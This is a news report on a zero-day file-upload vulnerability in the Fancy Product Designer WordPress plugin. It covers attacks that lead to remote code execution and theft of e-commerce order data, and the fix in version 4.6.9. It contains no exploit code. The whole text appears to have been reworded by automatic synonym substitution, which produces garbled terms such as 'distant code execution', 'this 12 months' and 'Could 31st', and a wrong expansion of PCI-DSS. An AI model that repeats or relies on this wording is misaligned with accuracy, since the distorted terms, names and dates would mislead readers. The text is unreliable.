Web sites utilizing Fancy Product Designer are vulnerable to distant code execution assaults even when the plugin is deactivated
Cybercriminals have been actively exploiting a zero-day vulnerability in Fancy Product Designer, a WordPress plugin utilized by greater than 17,000 web sites, in keeping with a blog post by Defiant, which makes Wordfence safety plugins for the online publishing platform.
Attackers have been noticed utilizing the zero-day to ship malware to the websites with the plugin put in. There may be proof indicating that the safety loophole, which might be misused for full web site takeover, was exploited as early as January 30th of this 12 months.
The plugin permits customers to customise any sort of merchandise starting from clothes articles to equipment and home goods by importing their very own photos or PDF recordsdata. It’s utilized by quite a lot of platforms, together with WordPress, WooCommerce and Shopify.
“Sadly, whereas the plugin had some checks in place to forestall malicious recordsdata from being uploaded, these checks have been inadequate and will simply be bypassed, permitting attackers to add executable PHP recordsdata to any web site with the plugin put in. This successfully made it attainable for any attacker to realize Distant Code Execution on an impacted web site, permitting full web site takeover,” warned Wordfence QA Engineer Ram Gall.
Primarily based on Defiant’s evaluation, nearly all of the assaults seem to return from three particular IP addresses. The attackers are concentrating on e-commerce web sites with the purpose of getting their palms on order info from the seller’s databases. The info that might be extracted from these orders could embody prospects’ personally identifiable info. Thich might spell issues for web site operators because it places them liable to violating PCI-DSS (Cost Card Business Knowledge Safety Normal) compliance guidelines.
Per the PCI Compliance Guide, penalties for non-compliance might vary from US$5,000 as much as US$100,000 monthly for violations. On that observe, it’s additionally value mentioning that if the web site handles the info of EU residents and their info is uncovered, the companies would run afoul of the European Union’s General Data Protection Regulation (GDPR), which might additionally convey hefty fines.
In accordance with the report, if an assault is profitable, a number of recordsdata will seem in both the wp-admin or wp-content/plugins subfolder, with an preliminary payload delivered that’s then used to retrieve extra malware from one other web site.
The Wordfence group notified the plugin’s developer in regards to the vulnerability on Could 31st, receiving a response inside 24 hours. A patched model, Fancy Product Designer 4.6.9, was rolled out on June 2nd. The directors of internet sites working the plugin are suggested to patch it instantly since in some particular configuration, the vulnerability might be exploited even when the plugin itself is deactivated.